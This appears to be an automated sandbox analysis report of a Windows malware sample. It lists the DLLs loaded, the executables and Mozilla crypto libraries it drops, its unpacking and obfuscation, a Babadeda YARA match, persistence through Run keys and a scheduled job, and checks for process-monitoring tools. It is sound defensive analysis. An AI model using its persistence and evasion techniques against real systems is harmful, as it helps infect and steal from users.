Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 6SoKuOqyNh.exe

Static file information: File size 1870848 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 6SoKuOqyNh.exe

Static PE information: Raw size of axajwlnp is bigger than: 0x100000 < 0x197400

Source:	Binary string: mozglue.pdbP source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr
Source:	Binary string: nss3.pdb@ source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Unpacked PE file: 2.2.6SoKuOqyNh.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 4.2.explorti.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fiti:R;.jotibe:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fiti:R;.jotibe:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Unpacked PE file: 47.2.RoamingFHJDBKJKFI.exe.ca0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Unpacked PE file: 50.2.RoamingHJKECAAAFH.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 12.2.d27375200a.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 37.2.d27375200a.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 37.2.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\1000003002\d27375200a.exe, type: DROPPED

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_004195E0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: 6SoKuOqyNh.exe	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: explorti.exe.2.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: d27375200a.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1fa44
Source: random[1].exe0.10.dr	Static PE information: real checksum: 0x0 should be: 0x1fa44
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: axplong.exe.47.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: enter[1].exe.11.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3

PE file contains sections with non-standard names

Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: .idata
Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: axajwlnp
Source: 6SoKuOqyNh.exe	Static PE information: section name: ubpicycu
Source: 6SoKuOqyNh.exe	Static PE information: section name: .taggant
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: .idata
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: axajwlnp
Source: explorti.exe.2.dr	Static PE information: section name: ubpicycu
Source: explorti.exe.2.dr	Static PE information: section name: .taggant
Source: random[1].exe.10.dr	Static PE information: section name: .fiti
Source: random[1].exe.10.dr	Static PE information: section name: .jotibe
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .fiti
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .jotibe
Source: random[1].exe0.10.dr	Static PE information: section name: .code
Source: d27375200a.exe.10.dr	Static PE information: section name: .code
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: wfabfqoe
Source: random[1].exe.11.dr	Static PE information: section name: qxvdwait
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: .idata
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: axajwlnp
Source: enter[1].exe.11.dr	Static PE information: section name: ubpicycu
Source: enter[1].exe.11.dr	Static PE information: section name: .taggant
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .idata
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: axajwlnp
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: ubpicycu
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .taggant
Source: freebl3.dll.11.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.11.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.11.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.11.dr	Static PE information: section name: .didat
Source: nss3.dll.11.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .idata
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: wfabfqoe
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: qxvdwait
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .taggant
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: .idata
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: wfabfqoe
Source: axplong.exe.47.dr	Static PE information: section name: qxvdwait
Source: axplong.exe.47.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041A9F5 push ecx; ret		11_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B536 push ecx; ret		11_2_6C67B549

Source: 6SoKuOqyNh.exe	Static PE information: section name: entropy: 7.9818006822367735
Source: 6SoKuOqyNh.exe	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: explorti.exe.2.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: explorti.exe.2.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: random[1].exe.10.dr	Static PE information: section name: .text entropy: 7.823853344462366
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .text entropy: 7.823853344462366
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.982589984423413
Source: random[1].exe.11.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: enter[1].exe.11.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: enter[1].exe.11.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: entropy: 7.982589984423413
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: axplong.exe.47.dr	Static PE information: section name: entropy: 7.982589984423413
Source: axplong.exe.47.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\enter[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\d27375200a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe	Jump to behavior
